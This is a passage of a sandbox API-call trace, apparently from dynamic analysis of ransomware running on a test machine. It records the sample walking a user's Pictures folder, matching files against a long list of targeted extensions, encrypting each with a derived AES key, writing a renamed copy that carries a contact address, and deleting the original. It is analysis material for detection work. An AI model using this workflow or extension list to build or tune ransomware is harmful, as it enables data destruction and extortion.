	[0197.512] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x250f, dwBufLen=0x250f | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x2510) returned 1
	[0197.513] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.513] RtlMoveMemory (in: Destination=0xfdd3f8, Source=0xfda128, Length=0x250f | out: Destination=0xfdd3f8) 
	[0197.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.513] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x250f, dwBufLen=0x2510 | out: pbData=0xfdd3f8*, pdwDataLen=0x18aefc*=0x2510) returned 1
	[0197.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.514] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0197.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.514] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.515] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0197.515] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.515] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.515] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.516] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.517] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 98
	[0197.517] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.518] WriteFile (in: hFile=0x388, lpBuffer=0xfdd3f8*, nNumberOfBytesToWrite=0x2510, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfdd3f8*, lpNumberOfBytesWritten=0x18b358*=0x2510, lpOverlapped=0x0) returned 1
	[0197.521] CloseHandle (hObject=0x388) returned 1
	[0197.522] CloseHandle (hObject=0x2c0) returned 1
	[0197.522] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp")) returned 1
	[0197.525] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp")) returned 0
	[0197.525] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2c14570, ftCreationTime.dwHighDateTime=0x1d96724, ftLastAccessTime.dwLowDateTime=0x4248f310, ftLastAccessTime.dwHighDateTime=0x1d97490, ftLastWriteTime.dwLowDateTime=0x4248f310, ftLastWriteTime.dwHighDateTime=0x1d97490, nFileSizeHigh=0x0, nFileSizeLow=0x6a50, dwReserved0=0x0, dwReserved1=0x0, cFileName="kxC0zn.bmp", cAlternateFileName="")) returned 1
	[0197.527] lstrcmpW (lpString1="kxC0zn.bmp", lpString2="..") returned 1
	[0197.527] lstrcmpW (lpString1="kxC0zn.bmp", lpString2=".") returned 1
	[0197.527] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.527] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="kxC0zn.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\kxC0zn.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\kxC0zn.bmp"
	[0197.527] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\kxC0zn.bmp") returned 54
	[0197.528] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.528] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\kxC0zn.bmp", cchLength=0x36 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp") returned 0x36
	[0197.528] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.528] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.528] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp"
	[0197.528] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp") returned 54
	[0197.529] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.529] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0197.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.530] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.530] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.530] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.530] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.532] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x6a50, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x6a50, lpOverlapped=0x0) returned 1
	[0197.535] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.535] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb770) returned 1
	[0197.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.537] CryptCreateHash (in: hProv=0xfcb770, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.538] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.538] CryptDeriveKey (in: hProv=0xfcb770, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb91b0) returned 1
	[0197.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.538] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x6a50, dwBufLen=0x6a50 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x6a60) returned 1
	[0197.540] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.540] RtlMoveMemory (in: Destination=0xfe3bd8, Source=0xfdd180, Length=0x6a50 | out: Destination=0xfe3bd8) 
	[0197.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.540] CryptEncrypt (in: hKey=0xfb91b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe3bd8*, pdwDataLen=0x18aefc*=0x6a50, dwBufLen=0x6a60 | out: pbData=0xfe3bd8*, pdwDataLen=0x18aefc*=0x6a60) returned 1
	[0197.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.541] CryptDestroyKey (hKey=0xfb91b0) returned 1
	[0197.542] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.542] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.542] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.542] CryptReleaseContext (hProv=0xfcb770, dwFlags=0x0) returned 1
	[0197.542] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.543] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.543] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.700] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 96
	[0197.700] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.701] WriteFile (in: hFile=0x388, lpBuffer=0xfe3bd8*, nNumberOfBytesToWrite=0x6a60, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe3bd8*, lpNumberOfBytesWritten=0x18b358*=0x6a60, lpOverlapped=0x0) returned 1
	[0197.705] CloseHandle (hObject=0x388) returned 1
	[0197.705] CloseHandle (hObject=0x2c0) returned 1
	[0197.706] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp")) returned 1
	[0197.711] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\kxc0zn.bmp")) returned 0
	[0197.711] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7937700, ftCreationTime.dwHighDateTime=0x1d97233, ftLastAccessTime.dwLowDateTime=0xbdc7ee00, ftLastAccessTime.dwHighDateTime=0x1d97437, ftLastWriteTime.dwLowDateTime=0xbdc7ee00, ftLastWriteTime.dwHighDateTime=0x1d97437, nFileSizeHigh=0x0, nFileSizeLow=0xbf4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="PZZbPV p9-WMoFgmv.jpg", cAlternateFileName="PZZBPV~1.JPG")) returned 1
	[0197.712] lstrcmpW (lpString1="PZZbPV p9-WMoFgmv.jpg", lpString2="..") returned 1
	[0197.712] lstrcmpW (lpString1="PZZbPV p9-WMoFgmv.jpg", lpString2=".") returned 1
	[0197.712] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.712] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="PZZbPV p9-WMoFgmv.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\PZZbPV p9-WMoFgmv.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\PZZbPV p9-WMoFgmv.jpg"
	[0197.712] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\PZZbPV p9-WMoFgmv.jpg") returned 65
	[0197.712] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.712] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\PZZbPV p9-WMoFgmv.jpg", cchLength=0x41 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg") returned 0x41
	[0197.713] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.715] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.715] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg"
	[0197.715] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\pzzbpv p9-wmofgmv.jpg") returned 65
	[0197.715] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.716] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.716] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0197.716] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.716] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vt